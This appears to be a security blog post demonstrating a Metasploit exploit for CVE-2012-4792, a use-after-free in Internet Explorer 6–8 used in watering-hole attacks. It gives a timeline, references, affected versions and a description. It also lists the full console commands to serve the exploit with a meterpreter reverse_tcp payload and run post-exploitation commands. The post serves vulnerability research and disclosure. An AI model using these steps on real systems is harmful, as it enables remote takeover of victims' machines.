Microsoft Internet Explorer CButton Vulnerability Metasploit Demo
Timeline :
CVE reference assigned on 2012-09-06
First samples of the attack discovered in Google cache on 2012-12-07
Vulnerability discovered being exploited in the wild on CFE.org around 2012-12-26
Vulnerability details provided by binjo, Eric Romang and FireEye on 2012-12-29
Microsoft Security Advisory published on 2012-12-30
Metasploit PoC provided on 2012-12-30
Metasploit module name changed on 2012-12-31
PoC provided by :
eromang
mahmud ab rahman
sinn3r
binjo
juan vazquez
Reference(s) :
CVE-2012-4792
MSA-2794220
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability
Attack and IE 0day Informations Used Against Council on Foreign Relations
CFR WATERING HOLE ATTACK DETAILS
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
Note: The module name has changed from ie_cdwnbindinfo_uaf to ie_cbutton_uaf
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed but a reference to it is kept and used again during a page reload; the freed memory, which is attacker-controllable, is then used, allowing arbitrary code execution in the context of the current user. Please note: this vulnerability has been exploited in the wild, targeting mainly China-, Taiwan- and US-based computers.
Commands :
use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid
I recommend reading these related posts:
- Microsoft Release Security Advisory MSA-2794220 for CFE Internet Explorer 0day
- Attack and IE 0day Informations Used Against Council on Foreign Relations
- Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More
- Chinese Uygur Minority Also Targeted in the CFR Watering Hole Attack And More
- Microsoft Out-Of-Band Patch for Internet Explorer CVE-2012-4792 Vulnerability
- MS13-008 Patch Internet Explorer CVE-2012-4792 0day Vulnerability
- Department of Labor Watering Hole Campaign Review
- Watering Hole Campaign Use Latest Java and IE Vulnerabilities
- Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese
- A Deeper Look In CVE-2012-4792 Watering Hole Campaigns – Alljap Chapter
@eromang Anyone tried this on Xbox / Windows Phone?
Can you provide me with a download link for the affected Internet Explorer version at my email id please?